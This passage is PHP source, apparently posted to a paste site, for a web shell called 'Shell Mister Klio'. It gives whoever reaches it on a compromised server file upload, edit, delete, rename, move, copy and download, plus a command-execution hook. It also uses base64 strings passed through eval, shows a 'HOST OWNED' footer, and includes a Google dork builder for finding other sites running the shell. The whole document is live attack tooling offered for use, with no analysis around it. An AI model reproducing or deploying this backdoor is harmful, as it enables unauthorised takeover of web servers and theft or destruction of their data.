  4542.     $SCRIPTDIR = DIRname($_SERVER['PATH_TRANSLATED']);
  4543. } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
  4544.     $SCRIPTDIR = DIRname($_SERVER['SCRIPT_FILENAME']);
  4545. } elseif (function_exists('getcwd')) {
  4546.     $SCRIPTDIR = getcwd();
  4547. } else {
  4548.     $SCRIPTDIR = '.';}
  4549. $HOMEDIR = RELATIVE2ABSOLUTE($HOMEDIR, $SCRIPTDIR);
  4550. $DIR = (array_key_exists('DIR', $_REQUEST)) ? $_REQUEST['DIR'] : $HOMEDIR;
  4551.  
  4552. if (array_key_exists('OLDDIR', $_POST) && !path_is_relative($_POST['OLDDIR'])) {
  4553.     $DIR = RELATIVE2ABSOLUTE($DIR, $_POST['OLDDIR']);}
  4554. $DIRECTORY = simplify_path(addslash($DIR));
  4555. $FILES = array();
  4556. $ACTION = '';
  4557. if (!empty($_POST['SUBMIT_ALL'])) {
  4558.     $ACTION = $_POST['ACTION_ALL'];
  4559.     for ($i = 0; $i < $_POST['num']; $i++) {
  4560. if (array_key_exists("CHECKED$i", $_POST) && $_POST["CHECKED$i"] == 'true') {
  4561.             $FILES[] = $_POST["FILE$i"];
  4562.         }
  4563.     }
  4564. } elseif (!empty($_REQUEST['ACTION'])) {
  4565.     $ACTION = $_REQUEST['ACTION'];
  4566.     $FILES[] = RELATIVE2ABSOLUTE($_REQUEST['FILE'], $DIRECTORY);
  4567. } elseif (!empty($_POST['SUBMIT_UPLOAD']) && !empty($_FILES['UPLOAD']['name'])) {
  4568.     $FILES[] = $_FILES['UPLOAD'];
  4569.     $ACTION = 'UPLOAD';
  4570. } elseif (array_key_exists('num', $_POST)) {
  4571.     for ($i = 0; $i < $_POST['num']; $i++) {
  4572.         if (array_key_exists("submit$i", $_POST)) break;}
  4573. if ($i < $_POST['num']) {
  4574.         $ACTION = $_POST["ACTION$i"];
  4575.         $FILES[] = $_POST["FILE$i"];}}
  4576. if (empty($ACTION) && (!empty($_POST['SUBMIT_CREATE']) || (array_key_exists('FOCUS', $_POST) && $_POST['FOCUS'] == 'CREATE')) && !empty($_POST['CREATE_NAME'])) {
  4577.     $FILES[] = RELATIVE2ABSOLUTE($_POST['CREATE_NAME'], $DIRECTORY);
  4578.     switch ($_POST['CREATE_type']) {
  4579.     case 'DIRECTORY':
  4580.         $ACTION = 'CREATE_DIRECTORY';
  4581.         break;
  4582. /////// FILE
  4583. case 'FILE':
  4584.         $ACTION = 'CREATE_FILE';}}
  4585. if (sizeof($FILES) == 0) $ACTION = ''; else $FILE = RESET($FILES);
  4586. if ($lang == 'AUTO') {
  4587. if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
  4588.         $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);} else {
  4589.         $lang = 'EN';}}
  4590. $words = getwords($lang);
  4591. $COLS = ($WIN) ? 4 : 7;
  4592. if (!isset($DIRPERMISSION)) {
  4593.     $DIRPERMISSION = (function_exists('umask')) ? (0777 & ~umask()) : 0755;}
  4594. if (!isSET($FILEPERMISSION)) {
  4595.     $FILEPERMISSION = (function_exists('umask')) ? (0666 & ~umask()) : 0644;}
  4596. if (!empty($_SERVER['SCRIPT_NAME'])) {
  4597.     $self = html(basename($_SERVER['SCRIPT_NAME']));
  4598. } elseif (!empty($_SERVER['PHP_SELF'])) {
  4599.     $self = html(basename($_SERVER['PHP_SELF']));} else {
  4600.     $self = '';}
  4601. if (!empty($_SERVER['SERVER_SOFTWARE'])) {
  4602. if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'APACHE') {
  4603.         $APACHE = true;} else {
  4604.         $APACHE = false;}} else {
  4605.     $APACHE = true;}
  4606. switch ($ACTION) {
  4607. ///////////  UPLOAD
  4608. case 'UPLOAD':
  4609.     $DEST = RELATIVE2ABSOLUTE($FILE['name'], $DIRECTORY);
  4610. if (@FILE_EXISTS($DEST)) {
  4611.         LISTING_PAGE(error('ALREADY_EXISTS', $DEST));}
  4612. elseif (@MOVE_UPLOADED_FILE($FILE['tmp_name'], $DEST)) {
  4613.         LISTING_PAGE(NOTICE('UPLOADED', $FILE['name']));} else {
  4614.         LISTING_PAGE(error('NOT_UPLOADED', $FILE['name']));}
  4615.     break;
  4616. case 'CREATE_DIRECTORY':
  4617. if (@FILE_EXISTS($FILE)) {
  4618.         LISTING_PAGE(error('ALREADY_EXISTS', $FILE));} else {
  4619.         $MKOLD = @umask(0777 & ~$DIRPERMISSION);
  4620. if (@mkDIR($FILE, $DIRPERMISSION)) {
  4621.             LISTING_PAGE(NOTICE('CREATED', $FILE));} else {
  4622.             LISTING_PAGE(error('NOT_CREATED', $FILE));}
  4623.         @umask($MKOLD);}
  4624. break;
  4625. ///////// CREATE FILE
  4626. case 'CREATE_FILE':
  4627. if (@FILE_EXISTS($FILE)) {
  4628.         LISTING_PAGE(error('ALREADY_EXISTS', $FILE));} else {
  4629.         $MKOLD = @umask(0777 & ~$FILEPERMISSION);
  4630. if (@touch($FILE)) {
  4631.             EDIT($FILE);} else {
  4632.             LISTING_PAGE(error('NOT_CREATED', $FILE));}
  4633.         @umask($MKOLD);}
  4634.     break;
  4635. ////////// DELET
  4636. case 'DELETE':
  4637. if (!empty($_POST['NO'])) {
  4638.         LISTING_PAGE();} elseif (!empty($_POST['YES'])) {
  4639.         $FAILURE = array();
  4640.         $SUCCESS = array();
  4641.         foreach ($FILES as $FILE) {
  4642. if (del($FILE)) {
  4643.                 $SUCCESS[] = $FILE;} else {
  4644.                 $FAILURE[] = $FILE;}}
  4645.         $MESSAGE = '';
  4646. if (sizeof($FAILURE) > 0) {
  4647.             $MESSAGE = error('NOT_DELETED', implode("\n", $FAILURE));}
  4648. if (sizeof($SUCCESS) > 0) {
  4649.             $MESSAGE .= NOTICE('DELETED', implode("\n", $SUCCESS));}
  4650.         LISTING_PAGE($MESSAGE);} else {
  4651.         HTML_HEADER();
  4652. echo '<form action="' . $self . '?Mister=FILES" method="post" style="background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;">';
  4653. $MISTERKLIO11 = "<br><table class='dialog'><tr><td><center>"; echo ''. $MISTERKLIO11 .'' ;
  4654.         REQUEST_DUMP();
  4655. echo "\t<b>" . word('REALLY_DELETE') . '</b><p>';
  4656. foreach ($FILES as $FILE) {
  4657. echo "\t" . html($FILE) . "<br>\n";}
  4658. $MISTERKLIO10 = "</p><br>"; echo ''. $MISTERKLIO10 .'' ;
  4659. echo '<input type="submit" class="Mister-button" name="NO" value="' . word('NO') . '" >';
  4660. echo '<input type="submit" class="Mister-button" name="YES" value="' . word('YES') . '" " style="margin-left: 50px" />';
  4661. $MISTERKLIO9 = "<br><br></td></tr></table></form>"; echo ''. $MISTERKLIO9 .'' ;
  4662.         HTML_FOOTER(); }
  4663.     break;
  4664. ////////// RENAME
  4665. case 'RENAME':
  4666. if (!empty($_POST['DESTINATION'])) {
  4667.         $DEST = RELATIVE2ABSOLUTE($_POST['DESTINATION'], $DIRECTORY);
  4668. if (!@FILE_EXISTS($DEST) && @RENAME($FILE, $DEST)) {
  4669.             LISTING_PAGE(NOTICE('RENAMED', $FILE, $DEST));} else {
  4670.             LISTING_PAGE(error('NOT_RENAMED', $FILE, $DEST));}} else {
  4671.   $name = basename($FILE);
  4672.         HTML_HEADER();
  4673. echo '<form action="' . $self . '?Mister=FILES" method="post">';
  4674. $MISTERKLIO7 = "<br><table class='dialog' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;'><tr><td><center>"; echo ''. $MISTERKLIO7 .'' ;
  4675. $MISTERKLIO8 = '<input type="hidden" name="action" value="RENAME">'; echo ''. $MISTERKLIO8 .'' ;
  4676. echo '<input type="hidden" name="FILE" value="' . html($FILE) . '">';
  4677. echo '<input type="hidden" name="DIR" value="' . html($DIRECTORY) . '">';
  4678. echo '<b>' . word('RENAME_FILE') . '</b>';
  4679. echo '<p><b><span Style="color:#FFFFFF;">';  $ORIGINALEFILE = " ORIGINALE FILE : <br>";
  4680. echo ''. $ORIGINALEFILE .'</span></b>' . html($FILE) . '</p>' ; $RENAMETO = " RENAME TO : ";
  4681. echo '<b><span Style="color:#FFFFFF;">'; echo ''. $RENAMETO .'</span></b>' ;
  4682. echo '<input type="text" style="width:99%;color:#0078FF;background:-webkit-linear-gradient(top, #000000 0, #404040 100%) no-repeat; -moz-border-radius:11px;border-radius:11px;" name="DESTINATION" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
  4683. <input type="submit" class="Mister-button" value="' . word('RENAME') . '" /><p></p><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '">[ ' . word('BACK') . ' ]';
  4684. $MISTERKLIO6 = "</a><br><br></td></tr></table></form>";
  4685. echo ''. $MISTERKLIO6 .'' ;
  4686. HTML_FOOTER(); }
  4687.     break;
  4688. ///////// MOVE FILE
  4689. case 'MOVE':
  4690. if (!empty($_POST['DESTINATION'])) {
  4691.         $DEST = RELATIVE2ABSOLUTE($_POST['DESTINATION'], $DIRECTORY);
  4692.         $FAILURE = array();
  4693.         $SUCCESS = array();
  4694. foreach ($FILES as $FILE) {
  4695.             $FILENAME = substr($FILE, strlen($DIRECTORY));
  4696.             $d = $DEST . $FILENAME;
  4697. if (!@FILE_EXISTS($d) && @RENAME($FILE, $d)) {
  4698.                 $SUCCESS[] = $FILE;} else {
  4699.                 $FAILURE[] = $FILE;}}
  4700.         $MESSAGE = '';
  4701. if (sizeof($FAILURE) > 0) {
  4702.             $MESSAGE = error('NOT_MOVED', implode("\n", $FAILURE), $DEST);}
  4703. if (sizeof($SUCCESS) > 0) {
  4704.             $MESSAGE .= NOTICE('MOVED', implode("\n", $SUCCESS), $DEST);}
  4705.         LISTING_PAGE($MESSAGE);} else {
  4706.         HTML_HEADER();
  4707. echo '<form action="' . $self . '?Mister=FILES" method="post">';
  4708. $MISTERKLIO5 = "<br><table class='dialog' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;'><tr><td><center>" ;
  4709. echo ''. $MISTERKLIO5 .'' ;
  4710.         REQUEST_DUMP();
  4711. echo "\t<b>" . word('MOVE_FILES') . '</b><p>';
  4712. foreach ($FILES as $FILE) {
  4713. echo "\t" . html($FILE) . "<br />\n"; }
  4714. echo '</p>' . word('DESTINATION') . ':';
  4715. echo '<input type="text" name="DESTINATION" size="' . textfieldsize($DIRECTORY) . '" value="' . html($DIRECTORY) . '" />';
  4716. echo '<br><br><input type="submit" class="Mister-button" value="' . word('MOVE') . '" /><p>';
  4717. echo '</p><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '">[ ' . word('BACK') . ' ]</a>';
  4718. $MISTERKLIO4 = "<br><br></td></tr></table></form>"; echo ''. $MISTERKLIO4 .'' ;
  4719. HTML_FOOTER();}
  4720. break;
  4721. /////////  COPY
  4722. case 'COPY':
  4723. if (!empty($_POST['DESTINATION'])) {
  4724.         $DEST = RELATIVE2ABSOLUTE($_POST['DESTINATION'], $DIRECTORY);
  4725. if (@IS_DIR($DEST)) {
  4726.             $FAILURE = array();
  4727.             $SUCCESS = array();
  4728. foreach ($FILES as $FILE) {
  4729.                 $FILENAME = substr($FILE, strlen($DIRECTORY));
  4730.                 $MKDESET = addslash($DEST) . $FILENAME;
  4731. if (!@IS_DIR($FILE) && !@FILE_EXISTS($MKDESET) && @COPY($FILE, $MKDESET)) {
  4732.                     $SUCCESS[] = $FILE;} else {
  4733.                     $FAILURE[] = $FILE;}}
  4734.             $MESSAGE = '';
  4735. if (sizeof($FAILURE) > 0) {
  4736.                 $MESSAGE = ERROR('NOT_COPIED', implode("\n", $FAILURE), $DEST);}
  4737. if (sizeof($SUCCESS) > 0) {
  4738.                 $MESSAGE .= NOTICE('COPIED', implode("\n", $SUCCESS), $DEST);}
  4739.             LISTING_PAGE($MESSAGE);} else {
  4740. if (!@FILE_EXISTS($DEST) && @COPY($FILE, $DEST)) {
  4741.                 LISTING_PAGE(NOTICE('COPIED', $FILE, $DEST));} else {
  4742.                 LISTING_PAGE(ERROR('NOT_COPIED', $FILE, $DEST));}}} else {
  4743.  HTML_HEADER();
  4744. ///////// COPY FILES
  4745. echo '<form action="' . $self . '?Mister=FILES" method="post">';
  4746. $MISTERKLIO3 = "<br><table class='dialog' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;'><tr><td><center>";
  4747. echo ''. $MISTERKLIO3 .'' ;
  4748.         REQUEST_DUMP();
  4749. echo "\n<b>" . word('COPY_FILES') . '</b><p>';
  4750. foreach ($FILES as $FILE) {
  4751. echo "\t" . html($FILE) . "<br>\n";} echo '</p>' . word('DESTINATION') . ': ';
  4752. echo '<input type="text" name="DESTINATION" size="' . textfieldsize($DIRECTORY) . '" value="' . html($DIRECTORY) . '" />';
  4753. $MKBR1 = "<br><br>"; echo "". $MKBR1 ."";
  4754. echo '<input type="submit" class="Mister-button" value="' . word('COPY') . '" /><p>';
  4755. echo '</p><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '">[ ' . word('BACK') . ' ]</a>';
  4756. $MISTERKLIO1 = "<br><br></td></tr></table></form>"; echo ''. $MISTERKLIO1 .'' ;
  4757. HTML_FOOTER();}
  4758. /////////// DOWNLOAD
  4759.     break;
  4760. case 'DOWNLOAD':
  4761.     header('Pragma: public');
  4762.     header('Expires: 0');
  4763.     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  4764.     header('Content-Type: ' . getmimetype($FILE));
  4765.     header('Content-Disposition: attachment; FILENAME=' . basename($FILE) . ';');
  4766.     header('Content-Length: ' . FILESIZE($FILE));
  4767.     READFILE($FILE);
  4768.     break;
  4769. ///////// EDIT
  4770. case 'EDIT':
  4771. if (!empty($_POST['SAVE'])) {
  4772.         $content = str_replace("\r\n", "\n", $_POST['content']);
  4773. if (($f = @fopen($FILE, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
  4774.             LISTING_PAGE(NOTICE('SAVED', $FILE));} else {
  4775.             LISTING_PAGE(error('NOT_SAVED', $FILE));}} else {
  4776. if (@IS_READABLE($FILE) && @IS_WRITABLE($FILE)) {
  4777.             EDIT($FILE); } else {
  4778.             LISTING_PAGE(error('NOT_EDITED', $FILE));}}
  4779.  
  4780. break;
  4781. default: LISTING_PAGE(); }
  4782. echo '<br><br><br><br>'. $THEEND .'' ;
  4783. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'|';
  4784. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4785. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4786. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4787. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  4788. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4789. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  4790. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4791. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4792. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4793. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4794. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4795. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4796. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  4797. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4798. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4799. echo ''. $REPORTERROR .'</a></span></footer>';
  4800. exit;}
  4801. $TABLE1 = '<center><table width="100%" border="0"  cellspacing="5" style="background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;"><tr>';
  4802. echo ''. $TABLE1 .'' ; DIRMISTER_K ($DIR); 
  4803. $TD1 = '<td align="right" valign="bottom" ><textarea rows="20" cols="20" >';
  4804. echo ''. $TD1 .'' ;
  4805. ////////// COMMAND
  4806. if (!$_POST['COMMAND'] == ''){ EXMISTER_K (); } FOTMISTER_K($MK_TEXT,$MK_TEXT1,$DIR);
  4807. $UPLOADFILE = "<b> UPLOAD FILE : </b>";
  4808. $NAV1 = base64_decode("PG5hdiBjbGFzcz0iTWlzdGVyLW5hdiIgd2lkdGg9Ijk5JSIgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjAiIHN0eWxlPSJtYXJnaW46NXB4MDsiPg==/");
  4809. echo ''. $NAV1 .'' ;
  4810. $FROM1 = "<br><center><form method='POST' enctype='multipart/form-data' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;border:1px solid #4D4D4D;'>"; echo ''. $FROM1 .'' ;
  4811. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4812. $SPAN1 = '<span style="color:#FFFFFF;font-family: "Freight Sans Bold", Tahoma, sans-serif;font-size:11px;">'; echo ''. $SPAN1 .'' ;
  4813. echo  ''. $UPLOADFILE .'</b><input type="FILE" name="MKUP" style="font-family: "Freight Sans Bold", Tahoma, sans-serif;font-size:11px;">' ;
  4814. echo "<input type='text' name='DIR' value='$DIR' style='width:40%;border-radius:10px;color:white;font-family:Freight Sans Boldfont-size:11px;'>";
  4815. $INPUT1 = '<input type="submit" class="Mister-button" value="UPLOAD"></form></nav></center>';
  4816. echo ''. $INPUT1 .'' ;
  4817. echo '<br><center>'. $MK_TEXT .''; echo''. $MK_TEXT1 .'<br></center>';
  4818.     // GOOGLE DORK CREATER
  4819. if(isset($_GET['title']) ||
  4820. isset($_GET['text']) ||
  4821. isset($_GET['url']) ||isset($_GET['site'])){$title = $_GET['title'];$text = $_GET['text'];$url = $_GET['url'];$site =$_GET['site'];
  4822. if($title != ""){$title = " intitle:\"".$title."\" ";}
  4823. if($text != ""){$text = " intext:\"".$text."\" ";}
  4824. if($url != ""){$url = " inurl:\"".$url."\" ";}
  4825. if($site != ""){$site = " site:\"".$site."\" ";
  4826. }
  4827. //// Print the output now
  4828. ?>
  4829. <br><div class=content><center>
  4830. <form  method="GET"><br><font style='color:#FFFFFF;'><b> GOOGLE DORK : </b></font><br>Click For Redirect
  4831. </form><a target='_black' href='http://www.google.com/search?q=<?php echo $title.$text.$url.$site ?>'>  http://www.google.com/search?q=<?php echo $title.$text.$url.$site ?></a><br>
  4832. <?php } else { ?>
  4833. <div class=content><center><table style='width:99%'>
  4834.             <form action="" method="GET">
  4835. <font style='color:#FFFFFF;'> INTITLE </font><br>
  4836. <input type='text' name="title" placeholder="Shell Mister Klio" style='width:60%'>
  4837. <br>
  4838. <font style='color:#FFFFFF;'>  INTEXT </font><br>
  4839. <input type='text' name="text" placeholder="Mister Klio" style='width:60%'>
  4840. <br>
  4841. <font style='color:#FFFFFF;'>  INURL </font><br>
  4842. <input type='text' name="url" placeholder="MK.php" style='width:60%'>
  4843. <br>
  4844. <font style='color:#FFFFFF;'> DOMAINS </font><br>
  4845. <input type='text' name="site" placeholder="*.Com" style='width:60%'>
  4846. <br><br>
  4847. <input type="submit" class="Mister-button"  placeholder="GET GOOGLE DORK"/>
  4848. </form>
  4849. </table></center>
  4850. <?php
  4851.  }
  4852. //////// MY RIGHT
  4853. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'';
  4854. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4855. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4856. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4857. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  4858. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4859. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  4860. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4861. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4862. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4863. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4864. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4865. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4866. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  4867. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4868. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4869. echo ''. $REPORTERROR .'</a></span></footer>'; echo ''. $THEEND .'' ;
  4870. ///// EXIT;
  4871.  
  4872. ?>
Add Comment
Please, Sign In to add comment